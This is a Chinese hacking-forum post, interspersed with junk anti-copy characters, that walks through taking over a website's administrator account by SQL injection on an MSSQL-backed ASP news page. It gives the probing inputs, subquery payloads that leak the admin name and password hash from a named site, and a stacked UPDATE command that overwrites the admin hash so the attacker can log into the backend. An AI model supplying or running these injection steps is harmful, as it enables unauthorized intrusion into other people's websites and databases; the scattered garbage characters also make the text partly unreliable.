经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。1 O& a; ^/ y; \" p {
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
, t9 I5 }, z P测试如下:
6 x+ M0 t: {% _/ x5 K# {& hhttp://www.tmdsb.com/news.asp?id=1218 N L, K! k2 |! b/ r6 l8 a% d. K3 m& `
在地址后输入单引号,显示8 }+ m/ e2 |8 s8 }+ O I
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’; X% R$ F) \6 g5 [3 |
字符串 ’’’ 之前有未闭合的引号" c. D' _! {# Y# @; U
/news/tmdws.asp,行638 Y6 V `) t% [1 ~3 C
说明没有过滤单引号且数据库是MSSQL.
+ b5 @# W1 D6 Dand 1=1正常。and 1=2出错。肯定存在注入& z* r1 ^, |: a2 B1 x3 ]/ Q) a0 i
接着输入
+ Y% X' c5 ^5 t! ~7 G' B) Mhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin). G3 k3 i) a* r5 e0 c4 @- j1 ]
得到帐号为:admin
. A: y `2 q, fhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
( n% A4 q( j |得到密码为:a4716077c2ba075c r' a! A( V, p1 F4 E) ?' C7 f
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f294330 t. E; E9 k4 ~# n' U
命令如下 :
8 l6 a% c+ Q3 L" c. i1 T;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
9 S0 P& }% C" L) J/ }& r这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41